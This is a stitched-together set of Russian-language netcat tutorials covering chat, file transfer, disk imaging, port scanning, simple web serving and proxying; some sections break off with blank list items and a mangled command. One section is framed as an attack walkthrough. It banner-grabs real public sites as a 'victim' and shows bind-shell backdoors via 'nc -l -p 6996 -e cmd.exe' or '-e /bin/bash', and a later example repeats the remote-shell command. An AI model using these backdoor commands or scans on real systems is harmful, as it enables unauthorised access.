Здравствуй Уважаемый читатель Х!

Думаю, этот рисунок можно назвать мини-тестом "Хакер ли ты?". Попробуй сказать, что
означает этот забавный котенок. Ну а если затруднения все-таки возникают, знай, что перед тобой самый любимая вещь всех продвинутых людей, так или иначе
связанных с Сетью, и имя ей - Netcat.

Netcat - это утилита, которая позволяет читать и передавать данные через сетевые
соединения. Иными словами, Netcat позволяет тебе соединятся с чем угодно и делать что угодно. Netcat абсолютно самодостаточен, при грамотном использовании он может заменить любое программное средство, включая даже известный тебе
Apache. Итак, в самом простом варианте Netcat позволяет создавать TCP и UDP соединения с любого на любой порт, умеет "слушать" входящие соединения (причем можно приказать "котенку" ждать соединения только с указанных тобой адресов и даже портов!), может сканировать порты, разрешать DNS-запросы, посылать любые команды со стандартного ввода, выполнять заранее предопределенные действия, в ответ на соединение, которое слушает "котенок", делать Hex-дамп отправленных и полученных данных и много-много чего еще...

Хотя, думаю нужно было с самого начала сказать, что Netcat умеет все; и возможности его использования ограниченны лишь уровнем твоих знаний и твоей фантазией. Изначально, Netcat задумывался как Unix утилита, но как ты понимаешь не могло не найтись энтузиастов, которые бы не портировали "котенка" под Windows. Обе версии ты без труда найдешь в поисковиках по запросу "Netcat". Но преимущества, конечно, достаются Unix-оидам, которые при компиляции могут слегка подправить "котенка" и тем самым активировать отключенные по дефолту фишки "дополнительные возможности".

Если ты когда-либо пользовался "программно-реализованными атаками", а попросту говоря эксплоитами, то наверняка замечал, что более, чем в половине из них так или иначе используется Netcat. Это связано прежде всего с тем, что Netcat никогда и никоим образом не модифицирует входящие данные (равно как и исходящие), в отличие скажем от Telnet-клиента, который сначала интерпретирует входящие данные, а уж затем выдает их тебе. Именно поэтому Netcat превратился в мощный инструмент поиска и эксплуатации уязвимостей, благодаря которому Bugtraq пополнился сотнями новых постингов.

Но, если поиск уязвимостей тебе не по душе, можешь попробовать использовать Netcat в качестве web-браузера, или, скажем, почтового клиента; тем паче, что в Internet Explorer-е и Outlook-е нашли "свежие" дыры, старый добрый Уникод, хех... Причем, на этом поприще отличились наши русские парни (!Играет национальная гордость!). Если ты читаешь эту статью, используя Explorer, сходи, посмотри насколько твой "Осел"
дыряв .

Вот после такого и пересядешь на Netcat - не очень удобно, зато
безопасно... Ну и наконец, примеры "продвинутого" использования Netcat
(Unix):

  1. Netcat как ;
  2. Netcat как утилита " "; такие часто описываются в X, а ведь в действительности они просто отправляют запросы на хорошо известные тебе поисковики... Твой "котенок" тоже может делать эту полезную работу!;
  3. Netcat как ! Заставь провайдера отдохнуть!!!

Обрати внимание, все выполнено в виде shell-скриптов так что ты при необходимости сможешь подправить все, что угодно.
За сим хочу проститься. Читай мануалы, и удачи тебе в изучении в изучении культовой утилиты Netcat!

P.S./Личное/: Сайт http://georgy.h1.ru/ мною закрыт. Раз и навсегда. Спасибо всем, кто был моим гостем.

·nc -h

Как Вы можете видеть, основной синтаксис Netcat заключается в следующем.

Чтобы подключиться к другой машине:

·nc options host IP address port

чтобы прослушивать входящие соединения:

·nc -l -p port

Шаг 2: Используйте Netcat для подключения к удаленной системе

Давайте используем Netcat для подключения к удаленной системе. В нашем случае, постараемся подключиться к веб-серверу через порт 80. Набираем:

·nc 192.168.1.105 80


Шаг 3: Используйте Netcat, чтобы захватить баннер с отпечатками пальцев ОС

Как только мы получили связь TCP с веб мы можем использовать Netcat, чтобы захватить баннер веб сервера для идентификации, какое программное обеспечение работает на веб-сервере жертвы.

Помните, что, прежде чем атаковать любую систему, мы должны узнать как можно больше о жертве. Netcat может помочь нам с этой задачей, захватывая баннеры, которые веб-серверы обслуживают для новых подключений.

Теперь, когда у нас есть связь, мы можем захватить баннер с веб - сервера с помощью команды:

·HEAD / HTTP/1.0

Будьте внимательными и скопируйте в точности, как ввел автор, с косой чертой и пробелами.


Нажмите Enter несколько раз, и веб -сервер ответит своим баннером, сообщив нам, какое его программное обеспечение запущено. В нашем случае, мы можем видеть, что веб - сервер работает под управлением Microsoft IIS 6.0.

Мы можем использовать эту технику также на других общедоступных сайтах. Давайте попробуем на некоторых широко известных сайтах и посмотрим, какое программное обеспечение они используют на веб-сервере. Во-первых, давайте попробуем сайт wonderhowto.com. Когда мы пропингуем wonderhowto.com, то увидим, что IP-адрес 98.129.110.26. Таким образом, можно затем ввести:

·nc 98.129.110.26 80

После того, как будет связь, мы можем захватить баннер веба, снова набрав:

·HEAD / HTTP/1.0

А потом нажмите Enter два или три раза.


Как видим, wonderhowto.com работает на Microsoft-IIS/7.5.

Если мы попробуем то же самое с cnn.com, то получим результаты, приведенные ниже:


Интересно, cnn.com работает на nginx - веб сервере с открытым исходным кодом, который за очень короткий промежуток времени достиг в глобальном масштабе общего числа установок Microsoft IIS (Apache, как и раньше, используют более 60 % веб-серверов на планете).

Шаг 4: Используйте Netcat для прослушивания подключений

Теперь давайте используем netcat, чтобы создать слушателя на удаленной системе. Предположим, что у нас есть Windows Server, на котором мы установили netcat. Теперь мы можем ввести следующее, чтобы открыть netcat слушателя на порту 6996 (это может быть любой порт) в этой системе:

·nc - l -p 6996

Так был создан "слушатель", который может подключиться к нашему досугу. Обратите внимание, что на системах Windows, мы можем запустить эту же команду с верхним регистром L и это создаст постоянного слушателя, который откроется, даже если система будет перезагружена.

Шаг 5: Создайте Backdoor

Теперь давайте создадим бэкдор на зараженной системе, чтобы мы могли вернуться в любое время. Команда будет незначительно отличаться в зависимости от того, какую систему, Linux или Windows, атакуем.

Для Windows мы используем:

·nc -l -p 6996 -e cmd.еxe

Для Linux используем:

·nc -l -p 6996 -e /bin/bash

·nc 192.168.1.105 6996


Как Вы можете видеть, командную строку Windows провел по трубопроводу через наше подключение netcat непосредственно к нашей атакующей системе! Мы имеем этот ящик!

|

Система Linux известна тем, что в большинстве дистрибутивов огромное количество полезных утилит командной строки поставляются сразу вместе с ОС. Опытные системные администраторы могут выполнить большинство задач с помощью встроенных инструментов без необходимости установки дополнительного программного обеспечения.

Данное руководство посвящено работе утилиты . Этот своеобразный «швейцарский армейский нож» сетевых инструментов может быть полезен при мониторинге, тестировании и передаче данных через сетевые соединения.

В данном руководстве используется сервер Ubuntu 12.04, но в целом утилита netcat доступна практически на любом современном дистрибутиве. Ubuntu поставляется с BSD-вариантом утилиты, который и будет использован в этой статье. Другие версии могут работать по-другому или предоставлять другие опции.

Общий синтаксис

По умолчанию netcat работает путем инициации соединения TCP с удаленным хостом.

Базовый синтаксис:

netcat [опции] хост порт

Такая команда инициирует TCP-соединение с указанным хостом через заданный порт. В основном, она функционирует аналогично старой команде Linux — telnet. Имейте в виду, что ваше соединение будет установлено в незашифрованном виде.

Чтобы вместо установления TCP-соединения отправить UDP-пакет, используйте опцию -u:

netcat -u хост порт

Чтобы задать диапазон портов, укажите первый и последний порт диапазона через тире:

netcat хост первый_порт-последний_порт

Обычно данная команда используется с дополнительными флагами.

На большинстве систем можно использовать netcat или nc. Они взаимозаменяемы, поскольку являются псевдонимами для одной команды.

Использование для сканирования портов

Чаще всего netcat используют как сканер портов.

Хотя Netcat, вероятно, не самый умный инструмент для выполнения этой задачи (в большинстве случаев для этого больше подойдет nmap), он может выполнять простое сканирование портов, чтобы быстро определить открытые порты.

Для этого укажите диапазон портов для сканирования (как показано выше), а также используйте опцию -z, которая выполняет сканирование вместо установления соединений.

К примеру, чтобы просканировать все порты до порта 1000, выполните:

netcat -z -v domain.com 1-1000

Как видите, кроме опции -z в данной команде использована опция -v, благодаря которой netcat выводит более подробную информацию.

Результат имеет такой вид:

nc: connect to domain.com port 1 (tcp) failed: Connection refused
nc: connect to domain.com port 2 (tcp) failed: Connection refused
nc: connect to domain.com port 3 (tcp) failed: Connection refused
nc: connect to domain.com port 4 (tcp) failed: Connection refused
nc: connect to domain.com port 5 (tcp) failed: Connection refused
nc: connect to domain.com port 6 (tcp) failed: Connection refused
nc: connect to domain.com port 7 (tcp) failed: Connection refused
. . .
Connection to domain.com 22 port succeeded!
. . .

Как видите, эта команда выводит достаточно подробный результат, а также сообщает, было ли сканирование каждого отдельного порта успешным или нет.

Это удобно при использовании доменного имени.

Тем не менее, указывая нужные IP-адреса, можно значительно ускорить сканирование. Затем можно использовать флаг -n, чтобы указать, что не нужно разрешать IP-адрес с помощью DNS:

netcat -z -n -v 111.111.111.111 1-1000

Возвращаемые сообщения отправляются в стандартный поток ошибок. Сообщения о стандартных ошибках можно отправлять в стандартный вывод, чтобы фильтровать результаты.

Для перенаправления стандартной ошибки в стандартный вывод используется bash-синтаксис 2>&1; полученные результаты фильтруются с помощью grep:

netcat -z -n -v 111.111.111.111 1-1000 2>&1 | grep succeeded
Connection to 111.111.111.111 22 port succeeded!

Итак, теперь можно видеть, что единственный открытый порт на удаленной машине в диапазоне 1-1000 — это порт 22, стандартный порт SSH.

Общение с помощью netcat

Команда netcat не ограничивается отправкой пакетов TCP и UDP. Она также может прослушивать порт на соединения и пакеты, что дает возможность подключить два экземпляра netcat в отношении «клиент-сервер».

Который компьютер является сервером, а который — клиентом, существенно только во время начальной настройки. После того, как соединение установлено, связь одинакова в обоих направлениях.

На одной машине нужно сказать netcat прослушивать определенный порт на подключения. Это делается с помощью параметра -l, после которого указывается номер порта:

Выполнив эту команду, netcat прослушивает соединения TCP на порту 4444. Теперь обычный пользователь (не root) не сможет открывать какие-либо порты до 1000 (для безопасности сервера).

На втором сервере нужно подключиться к первой машине через указанный порт. Это делается так же, как было показано ранее:

netcat domain.com 4444

После установления соединения может показаться, что ничего не произошло. Но теперь можно отправлять сообщения по обе стороны соединения и они будут видны на обоих серверах.

Введите сообщение и нажмите ENTER. Сообщение появится как на локальном, так и на удаленном сервере. Это работает и в обратном направлении.

Завершив передачу сообщений, нажмите CTRL-D, чтобы прервать TCP-соединение.

Обмен файлами с помощью netcat

Ознакомившись с основными функциями утилиты и выполнив предыдущие примеры, можно перейти к более сложным задачам.

Как уже говорилось, утилита netcat создает TCP-соединения, с помощью которых можно передавать практически любой вид информации, не ограничиваясь набранными пользователем сообщениями. Эти знания можно использовать, чтобы превратить netcat в программу передачи файлов.

Опять же, нужно выбрать одну машину для прослушивания соединений. Однако, вместо того, чтобы печатать информацию на экран (как в предыдущем примере), netcat разместит всю информацию прямо в файл:

netcat -l 4444 > received_file

На втором компьютере нужно создать простой текстовый файл:

echo "Hello, this is a file" > original_file

Теперь можно использовать этот файл в качестве входных данных для создания соединения со слушающим компьютером. Файл будет передаваться так же, как если бы он был набран в интерактивном режиме:

netcat domain.com 4444 < original_file

Как можно видеть, на компьютере, который ожидал соединения, теперь есть новый файл с именем «received_file», содержащий введенные на другом компьютере данные:

cat received_file
Hello, this is a file

Как видите, подобные соединения можно легко использовать для передачи любого рода информации.

К примеру, можно передать содержимое целого каталога; для этого создайте безымянный тарбол, передайте его на удаленную систему и распакуйте его в удаленный каталог.

На принимающей стороне можно использовать следующую команду, чтобы предупредить о том, что нужно получить и распаковать файл:

netcat -l 4444 | tar xzvf -

Тире в конце команды означает, что тарбол будет работать на стандартный ввод, который в настоящее время передается по сети, если соединение установлено.

На стороне, содержащей каталог, который нужно передать, упакуйте данный каталог в архив, а затем отправьте его на удаленный компьютер с помощью netcat:

tar -czf - * | netcat domain.com 4444

На этот раз тире в команде tar значит, что содержимое текущего каталога (как указано символом *) нужно заархивировать и передать, а затем записать результат в стандартный вывод.

Затем это записывается в подключение ТСР, передается другой стороне соединения и распаковывается в текущий каталог удаленного компьютера.

Это лишь один пример передачи более сложных данных с одного компьютера на другой. Также часто используется команда dd, которая создает образ диска на одной стороне и передает его на удаленный компьютер. Тем не менее, такой подход не охвачен данным руководством.

как простой веб-сервер

Утилита netcat уже была использована для передачи сообщений и файлов. Этот же подход поможет использовать netcat как простой веб-сервер. Это может пригодиться для тестирования готовых страниц.

Для начала нужно создать HTML-файл на одном сервере:

В данном файле можно разместить следующий простой код:



Test Page


Level 1 header


Subheading


Normal text here




Сохраните и закройте файл.

Данный файл нельзя обслуживать на порту веб-сервера по умолчанию (80) без привилегий root. Потому как обычный пользователь установите порт 8888.

Чтобы протестировать одну страницу и проверить, как она отображается, наберите что-то вроде:

netcat -l 8888 < index.html

Теперь контент можно просмотреть в браузере, посетив:

http://IP_сервера:8888

Эта команда выведет страницу, после чего соединение netcat закроется. При попытке обновить страницу она исчезнет.

Netcat может обслуживать страницу на продолжении неопределенного срока; для этого нужно сделать последнюю команду цикличной при помощи строки:

while true; do nc -l 8888 < index.html; done

Тогда страница будет продолжать получать соединения после того, как первое соединение было прекращено.

Чтобы остановить цикл, наберите CTRL-C.

Этот сервер позволит увидеть, как страница отображается в браузере, но не предоставляет более широкой функциональности. Никогда не используйте такой веб-сервер для обслуживания реальных сайтов: он небезопасен, кроме того, такие простые вещи, как ссылки, не всегда работают правильно.

Итоги

Данное руководство знакомит с основными функциями и использованием netcat. Так как этот инструмент универсален, он может быть использован для диагностики проблем и тестирования базовой функциональности TCP/UDP-соединений.

Кроме того, netcat позволяет общаться и обмениваться информацией между различными компьютерами, что очень важно для быстрого взаимодействия пользователей. Упрощая создание соединения, утилита netcat пытается сделать сетевые взаимодействия компьютеров более удобными, быстрыми и понятными.

Tags: ,

Почти в любом дистрибутиве Linux есть маленькая незаметная утилита netcat , или просто nc . Эта программа может создавать TCP-сокеты либо в режиме сервера для ожидания соединения, либо в режиме клиента для подключения к серверу. А по правде сказать, для netcat вовсе не играет роли, собираетесь ли вы использовать его как сервер или как клиент – его работа заключается только в том, чтобы собрать данные с stdin и передать на указанный сетевой адрес.

Простейший пример использования netcat – это создать клиент-серверный чат. Хотя это и очень примитивный способ создания чата, он наглядно показывает, как данная утилита работает. В последующих примерах будет подразумеваться, что машина, создающая сокет в режиме ожидания (сервер), имеет IP-адрес 192.168.0.1. Итак, создаем чат-сервер, который будет ожидать соединений на TCP-порт 3333:

$ nc -l 3333

Теперь мы можем с другого компьютера подключиться к данному серверу:

$ nc 192.168.0.1 3333

В данном случае клавиатура выступает в роли stdin. Все набираемое на клавиатуре на стороне сервера будет передано на терминал клиента, и наоборот.

Передача файлов

Совершенно аналогичным образом можно использовать netcat для передачи файлов между двумя компьютерами. При помощи следующей команды можно создать сервер, который подготовит файл к передаче:

Получить файл backup.iso на другом компьютере можно следующим образом:

$ nc 192.168.0.1 3333 > backup.iso

Как можно заметить, netcat не отображает никакой информации о процессе передачи данных. При работе с большими файлами это может быть довольно неудобно. Для решения этой проблемы можно использовать утилиту (progress viewer). В данном примере на стороне сервера будет в реальном времени отображаться информация о скорости и объеме передаваемых данных:

$ cat backup.iso | pv -b | nc -l 3333

Подобным образом можно показывать статистику и на стороне клиента:

$ nc 192.168.0.1 3333 | pv -b > backup.iso

Другие примеры

Утилита netcat может также пригодиться для создания образа раздела жесткого диска с возможностью отправки его на удаленный сервер на лету:

$ dd if=/dev/hdb5 | gzip -9 | nc -l 3333

А на удаленной машине принять созданный образ можно так:

$ nc 192.168.0.1 3333 | pv -b > myhdb5partition.img.gz

В случае необходимости отправки группы файлов – например, набора конфигурационных файлов – можно скомбинировать netcat и архиватор tar:

$ tar -czf - /etc/ | nc -l 3333

Дефис в качестве имени файла в параметрах tar необходим для того, чтобы вывести результат работы архиватора на stdin, который затем перенаправляется в netcat. Принять созданный бэкап на удаленной машине можно аналогично изложенному ранее:

$ nc 192.168.0.1 3333 | pv -b > mybackup.tar.gz

Безопасность

Очевидно, что при подобном использовании netcat информация передается по сети в исходном нешифрованном виде. Для передачи некритических данных это вполне приемлемо, но при передаче какой-либо ценной информации разумно использовать netcat в сочетании с SSH-туннелем.

Использование SSH-туннеля имеет два преимущества:

  1. Информация передается внутри зашифрованного туннеля, так что она хорошо защищена;
  2. На сервере не требуется открывать никаких дополнительных портов в конфигурации файрвола, поскольку соединение будет установлено через SSH

На стороне сервера файл в netcat выставляется точно так же, как описано ранее:

$ cat backup.iso | nc -l 3333

А вот на стороне клиента подключаемся к ожидающему соединений сокету netcat через SSH-туннель:

$ ssh -f -L 23333:127.0.0.1:3333 [email protected] sleep 10; \ nc 127.0.0.1 23333 | pv -b > backup.iso

Понятно, что есть и другие способы помещения соединения в SSH-туннель, но создание и использование туннеля именно таким образом имеет полезную особенность, что туннель автомагически закрывается при окончании передачи данных через netcat.

…и переносной сканер портов

Невероятно, но netcat еще можно использовать и для сканирования открытых портов. Для этого поможет параметр -z:

$ nc -z 192.168.0.1 80-90 Connection to 192.168.0.1 80 port succeeded!

В данном примере netcat сканировал диапазон портов 80-90 и сообщил, что на удаленной машине открыт порт 80.

На страницах man по утилите netcat также содержится и ряд других полезных советов и интересных примеров использования данной программы.

Оригинал: Useful netcat examples on Linux
Автор: Dan Nanni
Дата публикации: 27 января 2014 г.
Перевод: А.Панин
Дата перевода: 7 сентября 2016 г.

Обычно называемая "швейцарским ножом" для TCP/IP-сетей, утилита является чрезвычайно гибким инструментом, позволяющим выполнять практически все возможные действия с TCP/UDP-сокетами в Linux. Это один из наиболее популярных инструментов для диагностики и экспериментов с сетями в среде системных администраторов.

Учтите, что при использовании nc для приема соединений на портах известных сетевых служб (0-1023) вам понадобятся привилегии пользователя root. Во всех остальных случаях для корректной работы nc достаточно прав обычного пользователя.

1. Проверка наличия определенного открытого TCP-порта на удаленном узле

$ nc -vn 192.168.233.208 5000 nc: connect to 192.168.233.208 5000 (tcp) failed: Connection refused $ nc -v 192.168.233.208 22 Connection to 192.168.233.208 22 port succeeded! SSH-2.0-OpenSSH_6.0p1 Debian-4

2. Отправка тестового UDP-пакета на удаленный узел

Приведенная ниже команда предназначена для отправки тестового UDP-пакета с задержкой в 1 секунду на порт 5000 удаленного узла с заданным адресом.

$ echo -n "foo" | nc -u -w1 192.168.1.8 5000

3. Сканирование TCP-портов на удаленном узле

Приведенная ниже команда предназначена для сканирования портов из диапазонов и и вывода списка открытых портов.

$ nc -vnz -w 1 192.168.233.208 1-1000 2000-3000

4. Копирование файла (например, my.jpg) с узла с именем hostA.com на узел с именем hostB.com

$ nc -lp 5000 > my.jpg

$ nc hostB.com 5000 < my.jpg

5. Передача директории (со всем содержимым) с узла hostA.com на узел hostB.com

На узле с именем hostB.com (принимающая сторона):

$ nc -l 5000 | tar xvf -

На узле с именем hostA.com (передающая сторона):

$ tar cvf - /path/to/dir | nc hostB.com 5000

6. Сканирование UDP-портов на удаленном узле

$ nc -vnzu 192.168.1.8 1-65535 Connection to 192.168.1.8 68 port succeeded! Connection to 192.168.1.8 5353 port succeeded! Connection to 192.168.1.8 16389 port succeeded! Connection to 192.168.1.8 38515 port succeeded! Connection to 192.168.1.8 45103 port succeeded!

Приведенная выше команда позволяет вывести список открытых, принимающих данные UDP-портов на удаленном сервере.

7. Ожидание данных на UDP-порту и вывод принятых данных в текстовом формате

Приведенная ниже команда позволяет принимать сообщения (строки текста) на заданном UDP-порту.

$ nc -u localhost 5000

Обратите внимание на то, что данная команда будет завершать свою работу сразу же после приема первого сообщения. Если вы хотите принимать серию сообщений, вам придется использовать цикл while следующим образом:

$ while true; do nc -u localhost 5000; done

8. Сохранение (сжатого) файла образа жесткого диска (например, /dev/sdb) на удаленном сервере

На удаленном сервере:

$ nc -lp 5000 | sudo dd of=/backup/sdb.img.gz

На локальном узле, на котором установлен жесткий диск:

$ dd if=/dev/sdb | gzip -c | nc remote_server.com 5000

9. Восстановление содержимого жесткого диска из сжатого файла образа, сохраненного на удаленном сервере

На локальном узле:

$ nc -lp 5000 | gunzip -c | sudo dd of=/dev/sdb

На удаленном сервере, на котором сохранен файл образа жесткого диска (например, /backup/sdb.img.gz):

$ cat /backup/sdb.img.gz | nc my_local_host.com 5000

10. Передача статической веб-страницы по аналогии с веб-сервером

Выполните приведенную ниже команду для запуска веб-сервера, который будет передавать веб-страницу с именем test.html клиентам, соединяющимся с портом 8000.

$ while true; do nc -lp 8000 < test.html; done

Теперь проверьте доступность веб-страницы, перейдя с помощью веб-браузера по адресу: http://:8000/test.html . Обратите внимание на то, что для использования стандартного порта веб-сервера под номером 80 вам придется запустить nc с привилегиями пользователя root следующим образом:

$ while true; do sudo nc -lp 80 < test.html; done

11. Организация незащищенного чата между двумя узлами

На первом узле (192.168.233.203):

$ nc -lp 5000

На втором узле:

$ nc 192.168.233.203 5000

После выполнения двух приведенных выше команд все символы, введенные в окно терминала на любом из узлов появятся в окне терминала другого узла.

12. Запуск "удаленной командной оболочки", позволяющей выполнять произвольные команды на удаленном узле в процессе работы с локальным узлом

На удаленном узле (192.168.233.208):

$ nc -lp 5000 -e /bin/bash

На локальном узле:

$ nc 192.168.233.208 5000

После выполнения приведенной выше команды на локальном узле вы сможете выполнять любые команды на удаленном узле посредством окна терминала локального узла. Команды будут выполняться на удаленном узле, при этом вывод этих команд будет появляться в окне терминала локального узла. Данный подход может использоваться для создания бэкдора на удаленном узле.

13. Создание веб-прокси для определенного веб-сайта (например, google.com)

$ mkfifo proxypipe $ while true; do nc -l 5000 0Proxypipe; done

Приведенные выше команды позволяют создать именованный канал proxypipe и использовать утилиту nc для перенаправления всех соединений по протоколу TCP с портом 5000 локального узла на веб-сайт http://www.google.com посредством двунаправленного канала. После выполнения этих команд вы сможете попасть на главную страницу поисковой системы Google, введя в адресную строку веб-браузера адрес http://127.0.0.1:5000.

14. Создание SSL-прокси для определенного веб-сайта (например, google.com)

$ mkfifo proxypipe $ mkfifo proxypipe2 $ nc -l 5000 -k > proxypipe < proxypipe2 & $ while true do; openssl s_client -connect www.google.com:443 -quiet < proxypipe > proxypipe2; done

Приведенные выше команды позволяют использовать утилиту nc для создания прокси-сервера с поддержкой протокола SSL, позволяющего устанавливать соединения с веб-сайтом google.com.

15. Потоковая передача видеофайла с сервера и его просмотр с помощью проигрывателя mplayer на клиентской машине

На сервере потоковой передачи видео (192.168.233.208):

$ cat video.avi | nc -l 5000

На клиентской системе:

$ nc 192.168.233.208 5000 | mplayer -vo x11 -cache 3000 -

16. Прием соединений по протоколу TCP на определенном порту с использованием адреса IPv6

Приведенные ниже команды позволяют утилите nc использовать адрес IPv6 при приеме соединений на TCP-порту. Это может понадобиться в процессе тестирования корректности настройки адресации IPv6 в сети.

$ nc -6 -l 5000 $ sudo netstat -nap | grep 5000 tcp6 0 0:::5000:::* LISTEN 4099/nc

Если вам понравилась статья, поделитесь ею с друзьями: